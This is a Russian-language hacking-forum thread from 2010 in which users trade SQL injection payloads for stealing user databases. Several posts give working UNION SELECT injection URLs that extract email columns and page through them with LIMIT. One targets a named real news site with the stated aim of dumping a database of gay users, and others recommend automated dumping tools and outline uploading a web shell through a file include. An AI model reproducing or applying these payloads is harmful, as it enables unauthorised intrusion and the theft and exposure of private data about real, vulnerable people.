HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.11.2010, 00:09
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

1. залей в /tmp

2. ищи инклуд

3. подцепи шеллик
 
Ответить с цитированием

  #2  
Старый 04.11.2010, 23:01
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами: 8452680

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
попробуй unhex(hex()) , aes_encrypt
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--

Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
 
Ответить с цитированием

  #3  
Старый 04.11.2010, 23:06
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от ALIM  
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
вручную через лимит по одной записи, все через утилиту...
 
Ответить с цитированием

  #4  
Старый 04.11.2010, 23:07
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(CONCAT(e-mail),0x71),0x71),4+from+user+limit+0,1--

лимитом перебирай
 
Ответить с цитированием

  #5  
Старый 04.11.2010, 23:31
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от ALIM  
http://www.baywindows.com/index.php?ch=news&sc=glbt&sc3=&id=106949%20and%201 =2%20union%20select%20aes_decrypt(aes_encrypt(GROU P_CONCAT(email),0x71),0x71),2,3,4,5,6,7,8,9,10%20f rom%20users --
хотел слить базу гомиков, если кто-нибудь обьяснит в личку каким образом можно было слить всю базу, а не по одному скажу спасибо
что тут обьяснять? я же тебе выше написал, используй тулзу какую нибудь, например сипт или панголин...делов то...
 
Ответить с цитированием

  #6  
Старый 04.11.2010, 23:36
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Вопрос: Могу исполнять html, как залить шшел?
 
Ответить с цитированием

  #7  
Старый 05.11.2010, 00:01
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами: 10139306

Репутация: 1089


По умолчанию

Цитата:
Сообщение от EoGeneo  
Вопрос: Могу исполнять html, как залить шшел?
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
 
Ответить с цитированием

  #8  
Старый 05.11.2010, 00:05
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Цитата:
Сообщение от Kusto  
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
 
Ответить с цитированием

  #9  
Старый 05.11.2010, 00:09
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от EoGeneo  
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
А то, что HTML - это язык гипертекстовой разметки, тебе не пришло в голову?
 
Ответить с цитированием

  #10  
Старый 05.11.2010, 00:35
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от EoGeneo  
Вопрос: Могу исполнять html, как залить шшел?
Потому что гладиолус ! какой вопрос, таков и ответ.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...